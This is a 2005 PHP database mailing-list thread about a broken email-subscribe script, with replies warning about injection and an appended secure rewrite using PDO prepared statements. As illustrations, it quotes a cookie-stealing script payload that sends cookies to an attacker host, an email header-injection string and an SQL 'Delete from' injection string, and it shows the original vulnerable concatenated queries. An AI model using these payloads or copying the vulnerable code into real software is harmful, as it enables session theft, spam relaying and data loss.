Re: [PHP-DB] insert (database)
Martin Norland wrote:
> Jochem Maas wrote:
>> Yemi Obembe wrote:
>>> the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works fine but the insert doesn't. know why?
>>>
>>>     if ($v = strtolower($_POST['email'])) {
>>
>> what happens when $_POST['email'] is equal to
>>
>>     '
>>     document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
>>     ';
>>
>> or something like that? Just something to think about.
>
> Then the malicious user gets to send their own cookies for this site to another site of their choosing :P.
>
> I would be more worried about it being equal to things like:
>
>     "Spam my Enemy <[EMAIL PROTECTED]>" + "Spam my Enemy also <[EMAIL PROTECTED]>" + etc.
>
> or
>
>     "\r\nFrom: Idiots Inc. <[EMAIL PROTECTED]>"
>
> or
>
>     "'; Delete from arbitrary_table_name where 'yes'='yes"

ah yes - that would be an effective attack in/on an email ;-)

> All of which are easily prevented with some attention to detail (or in some cases newer versions of software, which explicitly allow only one statement per call).
>
> Finally - the concept of bind variables (or equivalent) is your friend (as Jochem already knows with firebird iirc).

yes indeed! praise to the guy who wrote the new firebird extension :-), savin' my ass on a daily basis :-)

> Cheers,

--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DB] insert (database)
Jochem Maas wrote:
> Yemi Obembe wrote:
>> the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works fine but the insert doesn't. know why?
>>
>>     if ($v = strtolower($_POST['email'])) {
>
> what happens when $_POST['email'] is equal to
>
>     '
>     document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
>     ';
>
> or something like that? Just something to think about.

Then the malicious user gets to send their own cookies for this site to another site of their choosing :P.

I would be more worried about it being equal to things like:

    "Spam my Enemy <[EMAIL PROTECTED]>" + "Spam my Enemy also <[EMAIL PROTECTED]>" + etc.

or

    "\r\nFrom: Idiots Inc. <[EMAIL PROTECTED]>"

or

    "'; Delete from arbitrary_table_name where 'yes'='yes"

All of which are easily prevented with some attention to detail (or in some cases newer versions of software, which explicitly allow only one statement per call).

Finally - the concept of bind variables (or equivalent) is your friend (as Jochem already knows with firebird iirc).

Cheers,
--
- Martin Norland, Database / Web Developer, International Outreach x3257
The opinion(s) contained within this email do not necessarily represent those of St. Jude Children's Research Hospital.
RE: [PHP-DB] insert (database)
try

        if (mysql_num_rows($res)>0) {
            echo "Your email: $v already in the list";
        } else {
            $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
            $result_in = mysql_query($sql_in);
            echo "Your email: $v subscribed!";
        }
    } else {
        include("index.php");
        exit;
    }

bastien

> From: Yemi Obembe <[EMAIL PROTECTED]>
> To: php-db@lists.php.net
> Subject: [PHP-DB] insert (database)
> Date: Wed, 2 Feb 2005 01:23:16 -0800 (PST)
>
> the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works fine but the insert doesn't. know why?
>
>     if ($v = strtolower($_POST['email'])) {
>         $db = mysql_connect(mysql, "usser", "pw");
>         $con = mysql_select_db("ng",$db);
>         $sql = "SELECT * FROM mytable WHERE email='$v'";
>         $res = mysql_query( $sql ) ;
>         if ($row = mysql_fetch_array($res)) {
>             echo "Your email: $v already in the list";
>         } else {
>             $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
>             $result_in = mysql_query($sql_in);
>             echo "Your email: $v subscribed!";
>         }
>     } else {
>         include("index.php");
>         exit;
>     }
>
> - A passion till tomorrow, Opeyemi Obembe | ng.clawz.com
Re: [PHP-DB] insert (database)
Yemi Obembe wrote:
> the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works fine but the insert doesn't. know why?
>
>     if ($v = strtolower($_POST['email'])) {

what happens when $_POST['email'] is equal to

    '
    document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
    ';

or something like that? Just something to think about.

>         $db = mysql_connect(mysql, "usser", "pw");
>         $con = mysql_select_db("ng",$db);
>         $sql = "SELECT * FROM mytable WHERE email='$v'";
>         $res = mysql_query( $sql ) ;
>         if ($row = mysql_fetch_array($res)) {
>             echo "Your email: $v already in the list";
>         } else {
>             $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
>             $result_in = mysql_query($sql_in);
>             echo "Your email: $v subscribed!";

you use different table names in each query. is that the intention?

>         }
>     } else {
>         include("index.php");
>         exit;
>     }
>
> - A passion till tomorrow, Opeyemi Obembe | ng.clawz.com
[PHP-DB] insert (database)
the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works fine but the insert doesn't. know why?

    if ($v = strtolower($_POST['email'])) {
        $db = mysql_connect(mysql, "usser", "pw");
        $con = mysql_select_db("ng",$db);
        $sql = "SELECT * FROM mytable WHERE email='$v'";
        $res = mysql_query( $sql ) ;
        if ($row = mysql_fetch_array($res)) {
            echo "Your email: $v already in the list";
        } else {
            $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
            $result_in = mysql_query($sql_in);
            echo "Your email: $v subscribed!";
        }
    } else {
        include("index.php");
        exit;
    }

- A passion till tomorrow, Opeyemi Obembe | ng.clawz.com
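The script above, rewritten as an added example (not code from any poster in this thread) that fixes the points raised in the replies: the insert fails because 'email' in single quotes is a string literal, not a column name, in MySQL; both queries now hit the same table; $_POST['email'] is validated and bound as a parameter instead of being spliced into SQL; and $v is escaped before it is echoed back. It assumes a MySQL table arcadia with a UNIQUE index on email, PDO in place of the old mysql_* functions, and placeholder DSN/credentials.

```php
<?php
// Added example, not from the thread. Subscribe script using PDO prepared
// statements so $_POST['email'] never becomes part of the SQL text.
// Assumptions: table `arcadia` with a UNIQUE index on `email`; the DSN and
// credentials below are placeholders.
declare(strict_types=1);

const DSN     = 'mysql:host=localhost;dbname=ng;charset=utf8mb4'; // placeholder
const DB_USER = 'user';   // placeholder
const DB_PASS = 'secret'; // placeholder

// Exceptions on, emulated prepares off: values are bound server-side.
$pdo = new PDO(DSN, DB_USER, DB_PASS, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

// Validate first: a syntactically valid address cannot carry quotes, <script>
// or CRLF, which rules out the script/header/SQL payloads quoted in the thread.
$v = strtolower(trim((string)($_POST['email'] ?? '')));
if ($v === '' || filter_var($v, FILTER_VALIDATE_EMAIL) === false) {
    include 'index.php';
    exit;
}

// One table for both queries, column name unquoted: INSERT INTO arcadia ('email')
// is a syntax error because 'email' is a string literal, so the original insert
// never executed.
$check = $pdo->prepare('SELECT 1 FROM arcadia WHERE email = :email');
$check->execute([':email' => $v]);
$safe = htmlspecialchars($v, ENT_QUOTES, 'UTF-8'); // escape before echoing

if ($check->fetchColumn() !== false) {
    echo "Your email: $safe already in the list";
} else {
    try {
        $insert = $pdo->prepare('INSERT INTO arcadia (email) VALUES (:email)');
        $insert->execute([':email' => $v]);
        echo "Your email: $safe subscribed!";
    } catch (PDOException $e) {
        // SQLSTATE 23000 = integrity constraint violation: a concurrent request
        // inserted the same address between our SELECT and INSERT. The UNIQUE
        // index, not the SELECT, is the real guard against double subscription.
        if ($e->getCode() === '23000') {
            echo "Your email: $safe already in the list";
        } else {
            throw $e;
        }
    }
}
```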